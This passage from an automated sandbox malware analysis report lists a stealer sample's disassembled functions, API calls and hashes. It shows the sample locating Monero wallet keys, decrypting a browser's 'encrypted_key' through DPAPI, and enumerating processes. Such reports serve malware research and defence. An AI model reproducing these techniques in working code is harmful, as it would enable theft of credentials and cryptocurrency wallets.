                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: bbd8d19e24a39c1232fad58ca42e72cbb25dfbb28bdc9afe56fe9de742936de5
                  • Instruction ID: ed93383a2f19e8a91af057838049a618d4898efddd721d9b5fa1ef4c098b34fe
                  • Opcode Fuzzy Hash: bbd8d19e24a39c1232fad58ca42e72cbb25dfbb28bdc9afe56fe9de742936de5
                  • Instruction Fuzzy Hash: 5DE08CB0A40208FBC720DBD4DC0AE6D7BFCEB88702F040094FD0D87280DA719E408BA2
                  Function 0013A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0013A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0013A6BC
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0013A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: f747d216a86f717f3f7ff54b4b3a1ccdd7ac6af3c6533b0a7b926ee38028cd6c
                  • Instruction ID: 7f95f7f3f540392f204e7d0e44053c303663e9d6c7cd29fc15c88978212ca0f0
                  • Opcode Fuzzy Hash: f747d216a86f717f3f7ff54b4b3a1ccdd7ac6af3c6533b0a7b926ee38028cd6c
                  • Instruction Fuzzy Hash: ADE11372850108ABEB15FBA4DC92EEE733CEF64305F918159F516760A1EF306A4DCB62
                  Function 0013D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013D481
                  • lstrlen.KERNEL32(00000000), ref: 0013D698
                  • lstrlen.KERNEL32(00000000), ref: 0013D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0013D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 944510f3d575a61b960ffae23f87f07eb524aa82e161b8fbb1d78a59cf1e88fa
                  • Instruction ID: 20ec0dd517c2e32346c91c63717b9c2e41658d17c1b0268b43c2b73ce1232c47
                  • Opcode Fuzzy Hash: 944510f3d575a61b960ffae23f87f07eb524aa82e161b8fbb1d78a59cf1e88fa
                  • Instruction Fuzzy Hash: AA9135728901099BEB15FBA0DC92DEE733CEF64305F924168F517660A1EF346A49CB62
                  Function 0013D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013D801
                  • lstrlen.KERNEL32(00000000), ref: 0013D99F
                  • lstrlen.KERNEL32(00000000), ref: 0013D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0013DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9cb0e938468f52de3c9177df69366c9ab6b19b306df67bba438eeb4ad3aa9cc5
                  • Instruction ID: 55f10ab8bc79d57919a71d1fc8a38a0bea4a4aa792f7b466147cac2d232c52ea
                  • Opcode Fuzzy Hash: 9cb0e938468f52de3c9177df69366c9ab6b19b306df67bba438eeb4ad3aa9cc5
                  • Instruction Fuzzy Hash: 468125729501059BEB15FBA0DC52DEE733DEF64305F924528F407A60B1EF346A49CB62
                  Function 00143560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 73c0778fc56be51d9e16aee0ede87d53799441c1ea2f5c0caa164515fe3db45f
                  • Instruction ID: 06040138e3048519500ec4cbb34006b18ac57a8a5486e24934749537ee6907f7
                  • Opcode Fuzzy Hash: 73c0778fc56be51d9e16aee0ede87d53799441c1ea2f5c0caa164515fe3db45f
                  • Instruction Fuzzy Hash: 23417FB1D10109EFDB04EFE4D845AEEB778AF58305F518018F426772A1DB35AA49CFA2
                  Function 00139CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00139D39
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
                    • Part of subcall function 00139AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00134EEE,00000000,?), ref: 00139B01
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139B2A
                    • Part of subcall function 00139AC0: LocalFree.KERNEL32(?,?,?,?,00134EEE,00000000,?), ref: 00139B3F
                    • Part of subcall function 00139B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00139B84
                    • Part of subcall function 00139B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00139BA3
                    • Part of subcall function 00139B60: LocalFree.KERNEL32(?), ref: 00139BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 8902fb26e78a9985baebcfd494f96a1d2c038292be1f47f6503d306f05336a42
                  • Instruction ID: f754df688d599622b2d953771d8afb842e2d779776529d3e2ccfb015c378d5e1
                  • Opcode Fuzzy Hash: 8902fb26e78a9985baebcfd494f96a1d2c038292be1f47f6503d306f05336a42
                  • Instruction Fuzzy Hash: 5A3140B6D10209ABCF14EFE4DC86EEFB7B8BF58304F144519E915A7241EB749A04CBA1
                  Function 00148680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001505B7), ref: 001486CA
                  • Process32First.KERNEL32(?,00000128), ref: 001486DE
                  • Process32Next.KERNEL32(?,00000128), ref: 001486F3
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • CloseHandle.KERNEL32(?), ref: 00148761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 561fb8d0ad0d09a48edfc0c47e4b29b8e3b675c6afb6bf4e3b64dbabfcf758f3
                  • Instruction ID: b13949a5ed13a3f5ac5c117aa910e5178bbbeb911a0ddf1bb719043f5f930b37
                  • Opcode Fuzzy Hash: 561fb8d0ad0d09a48edfc0c47e4b29b8e3b675c6afb6bf4e3b64dbabfcf758f3
                  • Instruction Fuzzy Hash: 2A318BB1941218ABDB25DF90CC91FEEB778EF54701F514199E10AA21A0DB306A84CFA2
                  Function 00147980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00150E00,00000000,?), ref: 001479B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 001479B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00150E00,00000000,?), ref: 001479C4
                  • wsprintfA.USER32 ref: 001479F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 09bd579287ed7bc3a42717faa7f9b5cf083bc5431612ee8385e6b4f0c8ccedee
                  • Instruction ID: ce303a0213fff2a3c1d3c83c06d46499d494ee159dc6e83cc9596d5cc221149a
                  • Opcode Fuzzy Hash: 09bd579287ed7bc3a42717faa7f9b5cf083bc5431612ee8385e6b4f0c8ccedee
                  • Instruction Fuzzy Hash: 141118B2904518AACB249FC9DD45BBEBBFCEB4CB11F14425AF605A2290D3395940C7B1
                  Function 001492E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00143AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00143AEE,?), ref: 001492FC
                  • GetFileSizeEx.KERNEL32(000000FF,00143AEE), ref: 00149319
                  • CloseHandle.KERNEL32(000000FF), ref: 00149327
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: 965ce75c5d54e75e02e37aa2595b1eb74200ce1f18d0fbb0ae650482e0ddaf7f
                  • Instruction ID: b405183fe58712042e3d323e203d9484a4094379f86bc7df39b2443282eba695
                  • Opcode Fuzzy Hash: 965ce75c5d54e75e02e37aa2595b1eb74200ce1f18d0fbb0ae650482e0ddaf7f
                  • Instruction Fuzzy Hash: 38F04979E44208BBDB24DFF0DC49F9E77B9BB88721F11C254BA55A72D0D770AA418B40
                  Function 0014C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 0014C74E
                    • Part of subcall function 0014BF9F: __amsg_exit.LIBCMT ref: 0014BFAF
                  • __getptd.LIBCMT ref: 0014C765
                  • __amsg_exit.LIBCMT ref: 0014C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0014C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
